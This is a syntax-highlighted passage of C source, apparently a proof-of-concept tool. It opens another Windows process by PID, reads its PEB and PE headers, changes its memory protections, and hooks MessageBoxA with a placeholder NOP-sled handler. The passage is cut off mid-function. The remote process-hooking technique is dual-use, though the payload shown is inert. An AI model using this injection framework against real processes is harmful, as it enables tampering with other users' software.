<span class="w"> </span><span class="n">HOOK_CONTEXT</span><span class="w"> </span><span class="o">*</span><span class="n">pHookContext</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">pid</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">bSuccess</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">handler</span><span class="w"> </span><span class="o">=</span><span class="w"></span>
<span class="w"> </span><span class="s">"</span><span class="se">\x90\x90\x90\x90\x90\x90\x90\x90</span><span class="s">"</span><span class="w"></span>
<span class="w"> </span><span class="s">"</span><span class="se">\x90\x90\x90\x90\x90\x90\x90\x90</span><span class="s">"</span><span class="w"></span>
<span class="w"> </span><span class="s">"</span><span class="se">\x90\x90\x90\x90\x90\x90\x90\x90</span><span class="s">"</span><span class="p">;</span><span class="w"></span>
<span class="cp">#ifdef _WIN64</span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] 64 architecture detected</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[-] Sorry, currently not supported</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="cp">#endif</span>
<span class="cp">#ifdef _WIN32</span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] 32 architecture detected</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="cp">#endif</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">argc</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">pid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetCurrentProcessId</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] using current process id as target</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">argc</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">pid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="p">)</span><span class="w"> </span><span class="n">atoi</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"Usage: %s PID"</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Try to open the specified process */</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">OpenProcess</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">PROCESS_QUERY_INFORMATION</span><span class="w"> </span><span class="o">|</span><span class="w"></span>
<span class="w"> </span><span class="n">PROCESS_VM_OPERATION</span><span class="w"> </span><span class="o">|</span><span class="w"></span>
<span class="w"> </span><span class="n">PROCESS_VM_READ</span><span class="w"> </span><span class="o">|</span><span class="w"></span>
<span class="w"> </span><span class="n">PROCESS_VM_WRITE</span><span class="w"> </span><span class="o">|</span><span class="w"></span>
<span class="w"> </span><span class="n">PROCESS_SET_QUOTA</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">FALSE</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">pid</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">hProcess</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[!] OpenProcess() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] Remote Process with PID=%d opened</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Hook shit */</span><span class="w"></span>
<span class="w"> </span><span class="n">pHookContext</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">HookFunction</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s">"USER32.DLL"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s">"MessageBoxA"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">handler</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">strlen</span><span class="p">(</span><span class="n">handler</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pHookContext</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[!] Hooking failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] Hooked process with PID=%d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">Sleep</span><span class="p">(</span><span class="mi">50000</span><span class="p">);</span><span class="w"> </span><span class="c1">// Sleep 50 seconds. Try now the new behaviour of the function :)</span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReleaseHook</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">pHookContext</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[!] Release Hook failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] Hook released for PID=%d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">CloseHandle</span><span class="p">(</span><span class="n">hProcess</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_SUCCESS</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="n">DWORD</span><span class="w"></span>
<span class="nf">FindRemotePEB</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">HMODULE</span><span class="w"> </span><span class="n">hNTDll</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">FARPROC</span><span class="w"> </span><span class="n">fpNtQueryInformationProcess</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">NTSTATUS</span><span class="w"> </span><span class="n">status</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PROCESS_BASIC_INFORMATION</span><span class="w"> </span><span class="n">procBasicInformation</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">ULONG</span><span class="w"> </span><span class="n">returnLength</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">hNTDll</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"ntdll"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">hNTDll</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"LoadLibraryA() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">fpNtQueryInformationProcess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetProcAddress</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hNTDll</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s">"NtQueryInformationProcess"</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">fpNtQueryInformationProcess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"GetProcAddress() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">NtQueryInformationProcess</span><span class="w"> </span><span class="n">ntQueryInformationProcess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>
<span class="w"> </span><span class="p">(</span><span class="n">NtQueryInformationProcess</span><span class="p">)</span><span class="n">fpNtQueryInformationProcess</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">status</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ntQueryInformationProcess</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="c1">// ProcessBasicInformation</span>
<span class="w"> </span><span class="o">&</span><span class="n">procBasicInformation</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">PROCESS_BASIC_INFORMATION</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">returnLength</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">status</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"NtQueryInformationProcess() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">status</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="p">)</span><span class="n">procBasicInformation</span><span class="p">.</span><span class="n">PebBaseAddress</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="cm">/* Gets the PEB address of the current process */</span><span class="w"></span>
<span class="n">DWORD</span><span class="w"> </span>
<span class="nf">FindOwnPEB</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">pebAddr</span><span class="p">;</span><span class="w"></span>
<span class="cp">#if defined(_WIN64)</span>
<span class="w"> </span><span class="c1">// x64: MSVC has no inline assembly, and the PEB pointer is stored at GS:[0x60].</span>
<span class="w"> </span><span class="c1">// Note: the DWORD return type truncates the 64-bit address.</span>
<span class="w"> </span><span class="n">pebAddr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="p">)</span><span class="n">__readgsqword</span><span class="p">(</span><span class="mh">0x60</span><span class="p">);</span><span class="w"> </span><span class="c1">// intrinsic declared in intrin.h</span>
<span class="cp">#elif defined(_WIN32)</span>
<span class="w"> </span><span class="n">_asm</span><span class="w"> </span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="n">eax</span><span class="w"> </span><span class="c1">// save eax on the stack</span>
<span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="w"> </span><span class="n">FS</span><span class="o">:</span><span class="p">[</span><span class="mh">0x30</span><span class="p">]</span><span class="w"> </span><span class="c1">// load the PEB pointer stored at FS:[0x30] (inside the TEB)</span>
<span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="p">[</span><span class="n">pebAddr</span><span class="p">],</span><span class="w"> </span><span class="n">eax</span><span class="w"> </span><span class="c1">// store the value of eax in the variable pebAddr</span>
<span class="w"> </span><span class="n">pop</span><span class="w"> </span><span class="n">eax</span><span class="w"> </span><span class="c1">// restore the original eax value</span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="cp">#endif</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">pebAddr</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="n">PIMAGE_DATA_DIRECTORY</span><span class="w"></span>
<span class="nf">ReadRemoteDataDirectoryRVA</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">LPCVOID</span><span class="w"> </span><span class="n">lpImageBaseAddress</span><span class="p">,</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">index</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_NT_HEADERS32</span><span class="w"> </span><span class="n">pNTHeaders</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_DATA_DIRECTORY</span><span class="w"> </span><span class="n">dataDir</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">BYTE</span><span class="o">*</span><span class="w"> </span><span class="n">lpBuffer</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">oldProtect</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">index</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="n">IMAGE_NUMBEROF_DIRECTORY_ENTRIES</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// valid indices are 0..15; index is unsigned</span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"Invalid DATA_DIRECTORY index</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBuffer</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">malloc</span><span class="p">(</span><span class="n">BUFFER_SIZE</span><span class="p">);</span><span class="w"> </span><span class="c1">// room for BUFFER_SIZE bytes of the remote image</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">lpBuffer</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"malloc() failed in ReadRemoteDataDirectoryRVA()</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">ZeroMemory</span><span class="p">(</span><span class="n">lpBuffer</span><span class="p">,</span><span class="w"> </span><span class="n">BUFFER_SIZE</span><span class="p">);</span><span class="w"> </span><span class="c1">// safe: lpBuffer is known to be non-NULL here</span>
<span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualProtectEx</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)</span><span class="n">lpImageBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">BUFFER_SIZE</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">PAGE_EXECUTE_READ</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">oldProtect</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"VirtualProtectEx() failed in ReadRemoteDataDirectoryRVA() with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
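<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">lpBuffer</span><span class="p">);</span><span class="w"> </span><span class="c1">// do not leak the local buffer on failure</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>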
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpImageBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBuffer</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">BUFFER_SIZE</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="mi">0</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"ReadProcessMemory() failed in ReadRemoteDataDirectoryRVA() with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
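<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">lpBuffer</span><span class="p">);</span><span class="w"> </span><span class="c1">// do not leak the local buffer on failure</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>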
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_DOS_HEADER</span><span class="w"> </span><span class="n">pDOSHeader</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_DOS_HEADER</span><span class="p">)</span><span class="n">lpBuffer</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pDOSHeader</span><span class="o">-></span><span class="n">e_magic</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mh">0x5a4d</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"Invalid DOS header. e_magic is not 0x5a4d</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
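<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">lpBuffer</span><span class="p">);</span><span class="w"> </span><span class="c1">// do not leak the local buffer on failure</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>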
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pNTHeaders</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_NT_HEADERS32</span><span class="p">)(</span><span class="n">lpBuffer</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pDOSHeader</span><span class="o">-></span><span class="n">e_lfanew</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pNTHeaders</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">Magic</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mh">0x10b</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="c1">// PE32</span>
<span class="w"> </span><span class="n">pNTHeaders</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">Magic</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mh">0x20b</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// PE32+</span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"Invalid Magic in OptionalHeader</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
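<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">lpBuffer</span><span class="p">);</span><span class="w"> </span><span class="c1">// do not leak the local buffer on failure</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>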
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] Detected %s architecture</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">pNTHeaders</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">Magic</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mh">0x10b</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"PE32"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"PE32+"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">dataDir</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">&</span><span class="n">pNTHeaders</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">DataDirectory</span><span class="p">[</span><span class="n">index</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">dataDir</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="cm">/*</span>
<span class="cm"> * Caller has to free the returned LOADED_IMAGE structure.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="n">PLOADED_IMAGE</span><span class="w"> </span><span class="nf">ReadRemoteImage</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">LPVOID</span><span class="w"> </span><span class="n">lpImageBaseAddress</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">PCHAR</span><span class="w"> </span><span class="n">lpBuffer</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_DOS_HEADER</span><span class="w"> </span><span class="n">pDOSHeader</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PLOADED_IMAGE</span><span class="w"> </span><span class="n">pImage</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RetReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">lpBuffer</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpImageBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">BUFFER_SIZE</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory() failed in ReadRemoteImage() with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pDOSHeader</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_DOS_HEADER</span><span class="p">)</span><span class="n">lpBuffer</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pDOSHeader</span><span class="o">-></span><span class="n">e_magic</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mh">0x5a4d</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// validate "MZ" before trusting e_lfanew</span>
